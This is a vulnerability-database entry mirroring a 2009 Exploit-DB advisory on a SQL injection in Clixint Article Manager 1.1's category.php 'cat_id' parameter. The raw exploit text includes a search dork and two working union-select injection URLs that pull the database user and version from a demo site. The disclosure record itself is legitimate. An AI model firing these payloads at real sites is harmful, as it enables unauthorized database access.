Article Manager

vendor:

Article Manager

by:

jiko

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Article Manager

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: NO

Related CWE: N/A

CPE: a:clixint:article_manager

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

The Article Manager is vulnerable to SQL injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable parameter 'cat_id' in the 'category.php' page. This can be exploited to extract information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

-------------------------------------------------------------------------

  --          JIKO FroM No-exploit.Com        ---

-------------------------------------------------------------------------

# Author  : jiko

# email  : jalikom@hotmail.com

# Home   : www.no-exploit.Com

# Script  : http://www.clixint.com/products/articles -->Article Manager -->Price: $99 USD
              $99*10 Dh(maroc)=990Dh=19800 Real maghribi
# Dork: Copyright 2006 Â© Flax Article Manager v1.1

=========================[JAWAD Cha7ta 4 ever]===================

# Exploit  :

               http://no-exploit.com

            Demo:    

 http://www.articlesitedemo.com/category.php?cat_id=3%20and%201=0%20union%20select%200,1,user(),3,4,5--
 http://www.articlesitedemo.com/category.php?cat_id=3%20and%201=0%20union%20select%200,1,version(),3,4,5-- (V 4 :) )
 

Top: ( R07 T9awwad ) To str0ke & Milw0rM

 Cyber-Zone CHof Lfo9

=========================[Thanks To Allah ]===================
 Ma3aki ya GaZa Ø±ØÙ… Ø§Ù„Ù„Ù‡ Ø´Ù‡Ø¯Ø§Ø¦Ùƒ


 greetz : all my friend and all No-exploit members and

 $ cyber-zone $ leopard $ Hassin X

 all muslims

 cyber-zone Wald Bladi B7al Khoya
-------------------------------------------------------------------------

  --          JIKO FroM No-exploit.Com        ---

-------------------------------------------------------------------------

------==        troops of Mohamed comming inchalah      =-----------------

Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc

# milw0rm.com [2009-01-25]